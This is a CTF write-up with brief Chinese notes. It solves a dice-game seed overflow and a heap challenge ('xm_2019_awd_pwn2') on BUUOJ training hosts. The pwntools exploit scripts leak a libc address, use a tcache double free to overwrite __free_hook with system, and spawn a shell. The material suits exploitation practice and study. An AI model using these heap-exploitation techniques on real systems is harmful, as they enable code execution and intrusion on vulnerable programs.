qctf_2018_dice_game
溢出，控制 seed 值，使伪随机序列为固定值
#include <stdlib.h>
#include <stdio.h>
#define MAX 50
/*
 * Print the first MAX dice values that glibc rand() yields after srand(0).
 *
 * The seed is a compile-time constant, so the printed sequence is identical
 * on every run; this is the property the note above relies on once the
 * challenge's seed can be forced to 0.  Output is one quoted, comma-separated
 * die face (1..6) per value, ready to paste into a list.
 */
int main(void)
{
    int roll;

    srand(0); /* constant seed: the whole sequence is reproducible */
    for (roll = 0; roll < MAX; roll++) {
        /* rand() % 6 is 0..5; shift to a die face 1..6 */
        printf("'%d',", rand() % 6 + 1);
    }
    printf("\n");
    return 0;
}
from pwn import*
#r=process('./QCTF_2018_dice_game')
r=remote('node4.buuoj.cn',29426)
# 0x40 bytes of filler followed by p64(0): the overflow described in the
# note above, which places 0 into the seed -- the same seed the C program
# above uses (srand(0)).  str/bytes concatenation here is Python 2 style.
r.sendline('a'*0x40+p64(0))
# The 50 expected die faces; presumably the output of the C generator above.
a=['2','5','4','2','6','2','5','1','4','2','3','2','3','2','6','5','1','1','5','5','6','3','4','4','3','3','3','2','2','2','6','1','1','1','6','4','2','5','2','5','4','4','4','6','3','2','3','3','6','1']
for i in range(50):
    r.recvuntil('Give me the point(1~6): ')
    r.sendline(a[i])
r.interactive()
xm_2019_awd_pwn2
这题限制最多创建 18 个堆。如果 libc 2.27 加了 double free 检测，用 fastbin attack 就差一个堆就可以做出来（不知是不是 AWD 时被修过）；而 BUU 的远端是老版本，没有 double free 检测，用 tcache double free 就可以解出。
from pwn import *
from LibcSearcher import *
local_file = './xm_2019_awd_pwn2'
local_libc = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
# 0 = run the binary locally under pwntools, anything else = connect to the
# remote service.  This copy is the local-debugging variant.
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    # Host/port are left blank in this copy; this branch is never reached
    # while select == 0.
    r = remote('', )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
# Short aliases for the tube I/O calls.  Note that sa and sea are identical.
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
# Pad a partial little-endian address to 4/8 bytes before unpacking it
# (str padding -- Python 2 semantics).
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
# Log a tagged address in hex via the tube's logger.
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
    """Attach gdb to the live tube ``r``, feeding it the optional script ``cmd``."""
    gdb.attach(r, cmd)
#---------------------
def add(size, content):
    """Menu option 1: request a chunk of ``size`` bytes and fill it with ``content``.

    Each prompt/answer pair is sent with sendlineafter (``sla``), in menu order.
    """
    dialogue = (
        ('>>', '1'),
        ('size:', str(size)),
        ('content:', content),
    )
    for prompt, answer in dialogue:
        sla(prompt, answer)
def free(index):
    """Menu option 2: release the chunk stored at slot ``index``."""
    slot = str(index)
    sla('>>', '2')
    sla('idx', slot)
def show(index):
    """Menu option 3: print the chunk at slot ``index`` (used for the libc leak)."""
    for prompt, answer in (('>>', '3'), ('idx', str(index))):
        sla(prompt, answer)
#-------------------
# First attempt (fastbin route, local libc-2.27).  It stops at debug() and,
# as the note above says, comes up one allocation short.  Trailing "#N"
# comments give the chunk index each add() lands in.
add(0x410,'pppp')#0
add(0x68,'aaaa')#1
free(0)
show(0)
# Read the leaked address up to the '\x7f' byte and unpack the last 6 bytes.
# The -96-0x10 adjustment is the author's libc-2.27 arena offset -- verify it
# against the libc actually in use if the leak does not line up.
malloc_hook=uu64(ru('\x7f')[-6:])-96-0x10
libc_base=malloc_hook-libc.sym['__malloc_hook']
print hex(libc_base)  # Python 2 print statement
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
#------------------------
# Seven 0x68 chunks (indices 2..8), then one more (9).
for i in range(7):
    add(0x68,'a'*0x60)#8
add(0x68,'')#9
# Release indices 1..7, then 8, 9, 8 -- index 8 is freed twice (the double
# free referred to in the note above).
for i in range(7):
    free(i+1)
free(8)
free(9)
free(8)
# Re-allocate seven chunks (indices 10..15), then the controlled ones.
for i in range(7):
    add(0x68,'aaaa')#15
add(0x68,p64(malloc_hook-0x23))#16
add(0x68,'')#17
add(0x68,'')#18
# A further allocation fails here (original comment: '失败'); see the note
# above on the creation limit.
#add(0x68,'failure')#19
debug()
r.interactive()
from pwn import *
from LibcSearcher import *
local_file = './xm_2019_awd_pwn2'
local_libc = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
# 0 = run the binary locally under pwntools, anything else = connect to the
# remote service.  This copy is the remote variant (select = 1).
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',25368 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
# Short aliases for the tube I/O calls.  Note that sa and sea are identical.
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
# Pad a partial little-endian address to 4/8 bytes before unpacking it
# (str padding -- Python 2 semantics).
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
# Log a tagged address in hex via the tube's logger.
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
    """Attach gdb to the live tube ``r``; ``cmd`` is an optional gdb script."""
    gdb.attach(r, cmd)
#---------------------
def add(size, content):
    """Menu option 1: allocate ``size`` bytes and write ``content`` into the chunk."""
    size_text = str(size)
    sla('>>', '1')
    sla('size:', size_text)
    sla('content:', content)
def free(index):
    """Menu option 2: release the chunk stored at slot ``index``."""
    for prompt, answer in (('>>', '2'), ('idx', str(index))):
        sla(prompt, answer)
def show(index):
    """Menu option 3: print the chunk at slot ``index``."""
    slot = str(index)
    sla('>>', '3')
    sla('idx', slot)
#-------------------
# Working version against the remote (older libc without the double-free
# check, per the note above).  Trailing "#N" comments give the chunk index
# each add() lands in.
add(0x410,'pppp')#0
add(0x68,'aaaa')#1
free(0)
show(0)
# Read the leaked address up to the '\x7f' byte and unpack the last 6 bytes.
# The -96-0x10 adjustment is the author's libc-2.27 arena offset -- verify it
# against the libc actually in use if the leak does not line up.
malloc_hook=uu64(ru('\x7f')[-6:])-96-0x10
libc_base=malloc_hook-libc.sym['__malloc_hook']
print hex(libc_base)  # Python 2 print statement
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
#------------------------
add(0x10,'')#2
add(0x10,'/bin/sh\x00')#3
# Index 2 is freed twice in a row -- the tcache double free the note above
# relies on; a libc with the double-free check would abort here.
free(2)
free(2)
add(0x10,p64(free_hook))#4
add(0x10,'')#5
add(0x10,p64(system))#6
# Releasing the chunk that holds "/bin/sh" is the trigger.
free(3)
r.interactive()